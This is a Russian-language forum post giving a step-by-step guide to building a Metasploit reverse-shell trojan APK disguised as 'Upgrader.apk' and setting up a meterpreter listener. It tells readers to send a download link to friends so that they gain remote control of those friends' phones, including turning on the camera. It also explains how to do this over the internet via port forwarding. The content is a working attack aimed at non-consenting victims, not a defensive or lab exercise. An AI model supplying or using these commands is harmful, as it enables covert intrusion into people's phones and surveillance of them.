-
Автор темы
- #1
Автор, не несёт ответственность за использование вами данных, содержащихся на этих веб-страницах либо найденных по ссылкам с них. Пожалуйста, примите во внимание, что вся информация, находящаяся здесь, предоставлена свободно, как акт доброй воли, без заключениякаких-либо договорённостей или договоров между вами и владельцами или пользователями данного сайта, владельцами серверов, на которыхон размещён, администраторами проекта,модераторами либо кем-то ещё, любым образом связанными с этим или родственными емупроектами, которые [договоры] могут стать предметом прямых претензий. Вампредоставляется ограниченное право копировать содержимое этой статьи — данное право не предусматривает и не подразумевает никакойдоговорной или иной ответственности за любуючасть статьи или её авторов, участников, организаторов или других пользователей.
Обратите внимание, что чтение, распространениеили изменение информации, размещённой встатье, может являться нарушением законов тойстраны, в которой вы просматриваете этот сайт.
Обратите внимание, что чтение, распространениеили изменение информации, размещённой встатье, может являться нарушением законов тойстраны, в которой вы просматриваете этот сайт.
Шаг первый - Запуск Kali Linux
Открываем Терминал и создаем trojan apk-приложение
Для этого напишите следующую команду:
Код:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk
(замените значение LHOST на ваш IP)
Вы также можете взломать Android в WAN, то есть через Интернет, используя свой общедоступный / внешний IP-адрес в LHOST и путем переадресации портов
Шаг второй - Открываем второй терминал
Пока файл создается,откройте второй терминал
Загрузите консоль metasploit, набрав в терминале:
Код:
msfconsole
Шаг третий - настройка Listener (слушителя)
После загрузки (потребуется время) загрузите эксплойт с несколькими обработчиками, набрав:
Код:
use exploit / multi / handler
Затем пропишите :
Код:
set payload android/meterpreter/reverse_tcp
Установите ваш IP в качестве значения LHOST 192.168.0.4 (Даже если вы взломали WAN-тип, ваш частный / внутренний IP-адрес здесь не является общедоступным / внешним)
Шаг четвёртый - Exploit!
Пропишите эту команду, чтобы запустить слушателя (listener) :
Код:
exploit
Скопируйте приложение, которое вы создали (Upgrader.apk) из корневой папки, на Android-телефон.
Затем отправьте его на любой файлообменик (например:
Пожалуйста, авторизуйтесь для просмотра ссылки.
).Затем отправьте ссылку, которую вам дал ФО, своим друзьям и как только они запустят ваше приложение, вы получите удаленный доступ к их телефонам! (работает только в локальной сети, но если вы использовали метод WAN, вы можете использовать этот эксплоит на любом телефоне,который подключен к сети Интернет)
Запустится консоль meterpreter , с помощью, которой вы можете управлять телефоном, команды для meterpreter, вы с легкостью сможете найти в Интернете , пробуем включить его камеру с помощью одной из таких команд:
Код:
webcam_stream
Q&A - Вопросы и Ответы (Q-Вопрос, A - ответ)
Q - Как взломать телефон WAN методом ?
A-
Это очень легко и почти то же самое.
Сначала вам нужно получить свой публичный IP-адрес. Вы можете найти его
Пожалуйста, авторизуйтесь для просмотра ссылки.
.Вам также нужен ваш частный ip. Используйте команду
Код:
ifconfig
в терминале, чтобы узнать его.
Теперь на вышеуказанных шагах есть только два небольших изменения
1) В команде msfvenom в LHOST вам нужно ввести свой публичный IP,
2) При создании слушателя / обработчика в LHOST вам необходимо ввести свой частный IP
Q- Приложение весит 0kb, что делать?
A- Это означает, что у вас есть синтаксическая ошибка. Повторите проверку команды, которую вы ввели, если она правильная, повторите проверку!
Q- В телефоне ошибка - приложение не установлено
A- Вам может потребоваться подписать ваш файлAPK, новые версии для Android могут дать ошибку
Последнее редактирование: